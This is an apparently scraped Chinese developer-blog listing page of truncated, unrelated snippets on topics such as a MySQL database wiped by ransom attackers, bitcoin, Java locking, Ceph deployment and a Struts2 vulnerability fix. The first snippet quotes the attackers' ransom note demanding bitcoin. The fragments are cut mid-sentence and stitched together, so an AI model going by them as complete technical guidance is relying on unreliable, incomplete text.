【已恢复】服务器MySQL被入侵，数据丢失恢复第四维度4 关于我买了台阿里云服务器 mysql 服务器数据库 linux database
背景：当时在宝塔安装了MySQL5.7，然后当时只是测试，就直接设置用户名和密码为root，今天在Navicat突然登录不上了，于是在linux下登录MySQL，只剩下一个ReadMe文件，于是打开看了一下：以下数据库已被删除：dbeco。我们有完整的备份。要恢复它，您必须向我们的比特币地址xxxx支付xx比特币（BTC）。如果您需要证明，请通过以下电子邮件与我们联系。[email protected]。任何
年中盘点 | 刺激战场：半年新增671款Dapps，区块链版吃鸡谁得天下？ DappVision
本文由微信公众号DappVision原创首发，转载请联系授权2008年由公认的“比特币创始人”中本聪第一次提出了区块链的概念，从第一个“创世区块”诞生至今，区块链已经发展了近十年。在2017年末，被称作“区块链新物种”的Dapp将我们迅速带入了区块链3.0时代，随之而来的是各大公链之争、Dapp开发激励计划陆续推出、分布式应用数量剧增，“空投”福利也成为吸引玩家参与的一种重要手段。“空投”这个词是
Dcoin交易所简介 Dcoin
Dcoin数字资产及衍生品交易平台，是全球首家金融级数字资产及衍生品交易平台，主要提供比特币、以太坊、莱特币等一系列区块链资产的币币交易服务，由区块链及数字资产爱好者创办，核心团队来自Google、百度、360等全球知名互联网公司。由注册于瑞士的DavoxTechnologyAG公司运营，目前在瑞士、韩国设有运营中心。Dcoin数字资产及衍生品交易平台为用户提供安全稳定的交易环境，保证用户的资产安
《斯坦福大学创业成长课》老虎先生
书籍简介想知道最有用的创业课——斯坦福大学和著名的硅谷孵化器YC公司研发的创业课程是怎么样的吗？想知道李笑来老师丰富的创业经历中总结的最热血沸腾也最精华的部分吗？这本书将为你揭晓所有的答案，把神秘而不可知的创业成功要素系统化、具象化，为你解决创业过程中的各种迷惑。关于作者李笑来，前新东方名师，著名天使投资人，中国比特币首富，新东方时期著有《TOEFL核心词汇21天突破》，为广大考生必备书籍，后著有
synchronized和Lock有什么区别?用新的Lock有什么好处? Shaw_Young
原始构成synchronized是关键字属于JVM层面monitorenter(底层是通过monitor对象来完成的)monitorexitLock是具体类(java.util.current.locks.Lock)是api层面的锁使用方法synchronized不需要用户去手动释放锁,当synchronized代码执行完后系统会自动让线程释放对锁的占用ReentrantLock则需要用户去手动释
008一字千金系列关于中本聪，你知道的只有这些！花名无缺
题记如今的这个花花世界，其实只源自于一个点---奇点。奇点大爆炸，宇宙迅速膨胀，各种神秘而又有潜力的星球产生，才有了地球这颗伟大的星球。2008年，有一个人，为了让这个这个世界上每个点能够与更多的点产生联系，动摇类似于美联储为中心的自私主义，发明了比特币，比特币的产生，整个世界仿佛获得一个无比珍贵的礼物，因为它就想潘多拉魔盒一般，不仅本身价值无限，而且它能像奇点一般，让更多的可能性出现！今天我想介
SQL Server内存性能监视工具 culuo4781 java linux python 数据库 mysql
内存压力使查询变慢(Memorypressureslowingdownqueries)ThisarticleisthesequelinaseriesaboutSQLServermonitoringtoolsandcommonperformanceissues.ThefirstarticleSQLServermonitoringtoolsfordiskI/Operformanceisabouthow
linux事件驱动,事件驱动糖卿 linux事件驱动
在前面的文章《双刃剑-理解多线程带来的安全问题》中，我们提到了多线程情况下存在的线程安全问题。本文将以这个问题为背景，介绍如何通过使用synchronized关键字解这一问题。...»synchronized底层原理通过反编译class文件，可以看到synchronized最关键的部分是monitor对象。又因为synchronized关键字使用的方法不同，可以将monitor对象使用分为以下两种
2021福布斯富豪榜前十半数关注比特币和区块链 Eslacoin艾斯拉量化
中本聪结合多位朋克社群的既有想法创造了比特币，其背后的科技和概念并非均为创新，但其利用密码学等控制币的发行和管理的想法带来了创新改变。随着越来越多的组织、群体和个人开始接受比特币，以比特币为代表的加密世界正不断扩大发展。尽管近一个月以来，比特币“四面楚歌”。但多名亿万富翁的目光仍关注在比特币上，相关资产配置中也不乏押注。值得注意的是，在2021年福布斯富豪榜中，就不乏加密的积极研究者。亚马逊杰夫·
3. ceph-mimic版本部署 Martin_wjc 7 存储 ceph chrome 前端
ceph-mimic版本部署一、ceph-mimic版本部署1、环境规划2、系统基础环境准备2.1关闭防火墙、SELinux2.2确保所有主机时间同步2.3所有主机ssh免密2.4添加所有主机解析3、配置ceph软件仓库4、安装ceph-deploy工具5、ceph集群初始化6、所有ceph集群节点安装相关软件7、客户端安装ceph-common软件8、在ceph集群中创建cephmonitor组
币圈老人的故事 Carykive
1、2011年5月，王纯通过某文章点开了en.bitcoin.it上的wiki链接，研读一晚，大彻大悟，犹如发现了新大陆般惊喜、兴奋、热血沸腾。2、比特币涨到7美元的时候，王纯下载了bitcoin0.2.x的客户端，那时软件自带挖矿功能，他用MacBook笔记本挖了一整夜，一无所获。于是想买几个比特币玩玩。（这一过程我也经历过，我用淘宝组装电脑挖了一夜的质数币，一无所获，于是开始去交易所买币。）3
SAX解析xml文件小猪猪08 xml
1.创建SAXParserFactory实例 2.通过SAXParserFactory对象获取SAXParser实例 3.创建一个类SAXParserHander继续DefaultHandler，并且实例化这个类 4.SAXParser实例的parse来获取文件 public static void main(String[] args) { //
为什么mysql里的ibdata1文件不断的增长？ brotherlamp linux linux运维 linux资料 linux视频 linux运维自学
我们在 Percona 支持栏目经常收到关于 MySQL 的 ibdata1 文件的这个问题。当监控服务器发送一个关于 MySQL 服务器存储的报警时，恐慌就开始了 —— 就是说磁盘快要满了。一番调查后你意识到大多数地盘空间被 InnoDB 的共享表空间 ibdata1 使用。而你已经启用了 innodbfileper_table，所以问题是： ibdata1存了什么？当你启用了 i
Quartz-quartz.properties配置 eksliang quartz
其实Quartz JAR文件的org.quartz包下就包含了一个quartz.properties属性配置文件并提供了默认设置。如果需要调整默认配置，可以在类路径下建立一个新的quartz.properties，它将自动被Quartz加载并覆盖默认的设置。下面是这些默认值的解释 #-----集群的配置 org.quartz.scheduler.instanceName =
informatica session的使用 18289753290 workflow session log Informatica
如果希望workflow存储最近20次的log，在session里的Config Object设置，log options做配置，save session log :sessions run ;savesessio log for these runs:20 session下面的source 里面有个tracing
Scrapy抓取网页时出现CRC check failed 0x471e6e9a != 0x7c07b839L的错误酷的飞上天空 scrapy
Scrapy版本0.14.4 出现问题现象： ERROR: Error downloading <GET http://xxxxx CRC check failed 解决方法 1.设置网络请求时的header中的属性'Accept-Encoding': '*;q=0' 明确表示不支持任何形式的压缩格式，避免程序的解压
java Swing小集锦永夜-极光 java swing
1.关闭窗体弹出确认对话框 1.1 this.setDefaultCloseOperation (JFrame.DO_NOTHING_ON_CLOSE); 1.2 this.addWindowListener ( new WindowAdapter () { public void windo
强制删除.svn文件夹随便小屋 java
在windows上，从别处复制的项目中可能带有.svn文件夹，手动删除太麻烦，并且每个文件夹下都有。所以写了个程序进行删除。因为.svn文件夹在windows上是只读的，所以用File中的delete()和deleteOnExist()方法都不能将其删除，所以只能采用windows命令方式进行删除
GET和POST有什么区别？及为什么网上的多数答案都是错的。 aijuans get post
如果有人问你，GET和POST，有什么区别？你会如何回答？我的经历前几天有人问我这个问题。我说GET是用于获取数据的，POST，一般用于将数据发给服务器之用。这个答案好像并不是他想要的。于是他继续追问有没有别的区别？我说这就是个名字而已，如果服务器支持，他完全可以把G
谈谈新浪微博背后的那些算法 aoyouzi 谈谈新浪微博背后的那些算法
本文对微博中常见的问题的对应算法进行了简单的介绍，在实际应用中的算法比介绍的要复杂的多。当然，本文覆盖的主题并不全，比如好友推荐、热点跟踪等就没有涉及到。但古人云“窥一斑而见全豹”，希望本文的介绍能帮助大家更好的理解微博这样的社交网络应用。微博是一个很多人都在用的社交应用。天天刷微博的人每天都会进行着这样几个操作：原创、转发、回复、阅读、关注、@等。其中，前四个是针对短博文，最后的关注和@则针
Connection reset 连接被重置的解决方法百合不是茶 java 字符流连接被重置
流是java的核心部分,,昨天在做android服务器连接服务器的时候出了问题,就将代码放到java中执行,结果还是一样连接被重置被重置的代码如下; 客户端代码; package 通信软件服务器; import java.io.BufferedWriter; import java.io.OutputStream; import java.io.O
web.xml配置详解之filter bijian1013 java web.xml filter
一.定义 <filter> <filter-name>encodingfilter</filter-name> <filter-class>com.my.app.EncodingFilter</filter-class> <init-param> <param-name>encoding<
Heritrix Bill_chen 多线程 xml 算法制造配置管理
作为纯Java语言开发的、功能强大的网络爬虫Heritrix，其功能极其强大，且扩展性良好，深受热爱搜索技术的盆友们的喜爱，但它配置较为复杂，且源码不好理解，最近又使劲看了下，结合自己的学习和理解，跟大家分享Heritrix的点点滴滴。 Heritrix的下载（http://sourceforge.net/projects/archive-crawler/）安装、配置，就不罗嗦了，可以自己找找资
【Zookeeper】FAQ bit1129 zookeeper
1.脱离IDE，运行简单的Java客户端程序 #ZkClient是简单的Zookeeper~$ java -cp "./:zookeeper-3.4.6.jar:./lib/*" ZKClient 1. Zookeeper是的Watcher回调是同步操作，需要添加异步处理的代码 2. 如果Zookeeper集群跨越多个机房，那么Leader/
The user specified as a definer ('aaa'@'localhost') does not exist 白糖_ localhost
今天遇到一个客户BUG，当前的jdbc连接用户是root，然后部分删除操作都会报下面这个错误：The user specified as a definer ('aaa'@'localhost') does not exist 最后找原因发现删除操作做了触发器，而触发器里面有这样一句 /*!50017 DEFINER = ''aaa@'localhost' */ 原来最初
javascript中showModelDialog刷新父页面 bozch JavaScript 刷新父页面 showModalDialog
在页面中使用showModalDialog打开模式子页面窗口的时候，如果想在子页面中操作父页面中的某个节点，可以通过如下的进行： window.showModalDialog('url',self,‘status...’); // 首先中间参数使用self 在子页面使用w
编程之美-买书折扣 bylijinnan 编程之美
import java.util.Arrays; public class BookDiscount { /**编程之美买书折扣书上的贪心算法的分析很有意思，我看了半天看不懂，结果作者说，贪心算法在这个问题上是不适用的。。下面用动态规划实现。哈利波特这本书一共有五卷，每卷都是8欧元，如果读者一次购买不同的两卷可扣除5%的折扣，三卷10%，四卷20%，五卷
关于struts2.3.4项目跨站执行脚本以及远程执行漏洞修复概要 chenbowen00 struts WEB安全
因为近期负责的几个银行系统软件，需要交付客户，因此客户专门请了安全公司对系统进行了安全评测，结果发现了诸如跨站执行脚本，远程执行漏洞以及弱口令等问题。下面记录下本次解决的过程以便后续 1、首先从最简单的开始处理，服务器的弱口令问题，首先根据安全工具提供的测试描述中发现应用服务器中存在一个匿名用户，默认是不需要密码的，经过分析发现服务器使用了FTP协议，而使用ftp协议默认会产生一个匿名用
[电力与暖气]煤炭燃烧与电力加温 comsci
在宇宙中,用贝塔射线观测地球某个部分,看上去,好像一个个马蜂窝,又像珊瑚礁一样,原来是某个国家的采煤区..... 不过,这个采煤区的煤炭看来是要用完了.....那么依赖将起燃烧并取暖的城市,在极度严寒的季节中...该怎么办呢? &nbs
oracle O7_DICTIONARY_ACCESSIBILITY参数 daizj oracle
O7_DICTIONARY_ACCESSIBILITY参数控制对数据字典的访问.设置为true,如果用户被授予了如select any table等any table权限,用户即使不是dba或sysdba用户也可以访问数据字典.在9i及以上版本默认为false,8i及以前版本默认为true.如果设置为true就可能会带来安全上的一些问题.这也就为什么O7_DICTIONARY_ACCESSIBIL
比较全面的MySQL优化参考 dengkane mysql
本文整理了一些MySQL的通用优化方法，做个简单的总结分享，旨在帮助那些没有专职MySQL DBA的企业做好基本的优化工作，至于具体的SQL优化，大部分通过加适当的索引即可达到效果，更复杂的就需要具体分析了，可以参考本站的一些优化案例或者联系我，下方有我的联系方式。这是上篇。 1、硬件层相关优化 1.1、CPU相关在服务器的BIOS设置中，可
C语言homework2，有一个逆序打印数字的小算法 dcj3sjt126com c
#h1# 0、完成课堂例子 1、将一个四位数逆序打印 1234 ==> 4321 实现方法一： # include <stdio.h> int main(void) { int i = 1234; int one = i%10; int two = i / 10 % 10; int three = i / 100 % 10;
apacheBench对网站进行压力测试 dcj3sjt126com apachebench
ab 的全称是 ApacheBench ，是 Apache 附带的一个小工具，专门用于 HTTP Server 的 benchmark testing ，可以同时模拟多个并发请求。前段时间看到公司的开发人员也在用它作一些测试，看起来也不错，很简单，也很容易使用，所以今天花一点时间看了一下。通过下面的一个简单的例子和注释，相信大家可以更容易理解这个工具的使用。
2种办法让HashMap线程安全 flyfoxs java jdk jni
多线程之--2种办法让HashMap线程安全多线程之--synchronized 和reentrantlock的优缺点多线程之--2种JAVA乐观锁的比较( NonfairSync VS. FairSync) HashMap不是线程安全的,往往在写程序时需要通过一些方法来回避.其实JDK原生的提供了2种方法让HashMap支持线程安全.
Spring Security（04）——认证简介 234390216 Spring Security 认证过程
认证简介目录 1.1 认证过程 1.2 Web应用的认证过程 1.2.1 ExceptionTranslationFilter 1.2.2 在request之间共享SecurityContext 1
Java 位运算 Javahuhui java 位运算
// 左移( << ) 低位补0 // 0000 0000 0000 0000 0000 0000 0000 0110 然后左移2位后，低位补0： // 0000 0000 0000 0000 0000 0000 0001 1000 System.out.println(6 << 2);// 运行结果是24 // 右移( >> ) 高位补"
mysql免安装版配置 ldzyz007 mysql
1、my-small.ini是为了小型数据库而设计的。不应该把这个模型用于含有一些常用项目的数据库。 2、my-medium.ini是为中等规模的数据库而设计的。如果你正在企业中使用RHEL,可能会比这个操作系统的最小RAM需求(256MB)明显多得多的物理内存。由此可见，如果有那么多RAM内存可以使用，自然可以在同一台机器上运行其它服务。 3、my-large.ini是为专用于一个SQL数据
MFC和ado数据库使用时遇到的问题你不认识的休道人 sql C++mfc
=================================================================== 第一个 =================================================================== try{ CString sql; sql.Format("select * from p
表单重复提交Double Submits rensanning double
可能发生的场景： *多次点击提交按钮 *刷新页面 *点击浏览器回退按钮 *直接访问收藏夹中的地址 *重复发送HTTP请求（Ajax）（1）点击按钮后disable该按钮一会儿，这样能避免急躁的用户频繁点击按钮。这种方法确实有些粗暴，友好一点的可以把按钮的文字变一下做个提示，比如Bootstrap的做法： http://getbootstrap.co
Java String 十大常见问题 tomcat_oracle java 正则表达式
　1.字符串比较，使用“==”还是equals()? 　　"=="判断两个引用的是不是同一个内存地址(同一个物理对象)。　　equals()判断两个字符串的值是否相等。　　除非你想判断两个string引用是否同一个对象，否则应该总是使用equals()方法。　　如果你了解字符串的驻留(String Interning)则会更好地理解这个问题。　　
SpringMVC 登陆拦截器实现登陆控制 xp9802 springMVC
思路，先登陆后，将登陆信息存储在session中，然后通过拦截器，对系统中的页面和资源进行访问拦截，同时对于登陆本身相关的页面和资源不拦截。实现方法： 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

再续服务器被肉鸡的经历-- struts2漏洞

你可能感兴趣的:(***,挖矿,比特币,monitor)